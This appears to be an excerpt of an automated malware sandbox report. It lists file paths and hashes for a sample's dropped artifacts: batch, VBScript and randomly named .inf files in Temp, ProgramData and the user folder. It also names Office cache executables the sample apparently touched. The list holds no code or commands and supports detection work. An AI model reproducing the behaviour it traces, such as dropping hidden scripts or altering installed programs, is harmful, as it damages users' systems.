C:\Users\Admin\AppData\Local\Temp\v4vcmk

MD5 6f90adcbf8a3254558fe0aa75e416573
SHA1 5e5baaa632e90d78297f3c5edb9c592f15c53d4d
SHA256 e69f8ed2ba8b1bf7bccd65052fb89719e1ff5178cf82b95fd302a3ae950811bb
SHA512 0d9b51f0514f7476179f7b57c231fb40aabb79c747f164852130ee35c1b8caa30a2f6d888e4530fe6e22a4098ccc04301890c1da70ef7a0b2d44d681b370564d

memory/572-143-0x0000000000400000-0x000000000043D000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\BEwwYoEY.bat

MD5 bae1095f340720d965898063fede1273
SHA1 455d8a81818a7e82b1490c949b32fa7ff98d5210
SHA256 ee5e0a414167c2aca961a616274767c4295659517a814d1428248bd53c6e829a
SHA512 4e73a24161114844d0e42c44c73205c4a57fa4169bd16c95fb7e9d6d5fcdf8bd01741541c77570556ac1f5ee260da67a9041f40381b6c6e0601c9de385bdc024

C:\Users\Admin\AppData\Local\Temp\file.vbs

MD5 4afb5c4527091738faf9cd4addf9d34e
SHA1 170ba9d866894c1b109b62649b1893eb90350459
SHA256 59d889a2bf392f4b117340832b4c73425a7fb1de6c2f83a1aaa779d477c7c6cc
SHA512 16d386d9ece30b459fd47ca87da1f67b38d52a8e55f8fd063762cb3b46ae2c10bc6eac7359b0d1ef4c31c1ac8748ae8f62f8816eff0691abdd3304df38e979a5

C:\ProgramData\DmwYMgQc\PKsMQUYQ.inf

MD5 e4594995cd5c9401b436c6170521d9e7
SHA1 574bc4cc39fd802e413e5c581aaf7a356e947aaf
SHA256 d59580b264927dc57f3467aae03eea0d0afd66702bd9311808bc6ec29720e696
SHA512 987180f90169b0ffd546e10db4dfdef098acc232003013373e64bd18de862ad27bbda55092667a1e1f68e3567c2cd07030ec34d432fc5a55df5f88e435dcd918

C:\Users\Admin\hYgwkYwM\QgAscQoI.inf

MD5 e4594995cd5c9401b436c6170521d9e7
SHA1 574bc4cc39fd802e413e5c581aaf7a356e947aaf
SHA256 d59580b264927dc57f3467aae03eea0d0afd66702bd9311808bc6ec29720e696
SHA512 987180f90169b0ffd546e10db4dfdef098acc232003013373e64bd18de862ad27bbda55092667a1e1f68e3567c2cd07030ec34d432fc5a55df5f88e435dcd918

C:\ProgramData\DmwYMgQc\PKsMQUYQ.inf

MD5 ef9c6d3a5a2f5946451ab4e57ae72526
SHA1 6e4c7b217b9d716c7782bf511338505b4258fd6e
SHA256 29962b4f227a5b38accaab943f5adb45617dff7b9a6dbbf01702495f23ae971d
SHA512 638f3004b4dad69ae744fe434b0d47f780e4a1b0808681b579f7c4089ea4cff0ce6d47ef2124b54d3e462855b7641ba2c243185283760438849a831158cc02ad

C:\Users\Admin\hYgwkYwM\QgAscQoI.inf

MD5 ef9c6d3a5a2f5946451ab4e57ae72526
SHA1 6e4c7b217b9d716c7782bf511338505b4258fd6e
SHA256 29962b4f227a5b38accaab943f5adb45617dff7b9a6dbbf01702495f23ae971d
SHA512 638f3004b4dad69ae744fe434b0d47f780e4a1b0808681b579f7c4089ea4cff0ce6d47ef2124b54d3e462855b7641ba2c243185283760438849a831158cc02ad

\MSOCache\All Users\{90140000-0011-0000-0000-0000000FF1CE}-C\ose.exe

\MSOCache\All Users\{90140000-0011-0000-0000-0000000FF1CE}-C\setup.exe

\MSOCache\All Users\{90140000-0115-0409-0000-0000000FF1CE}-C\dwtrig20.exe
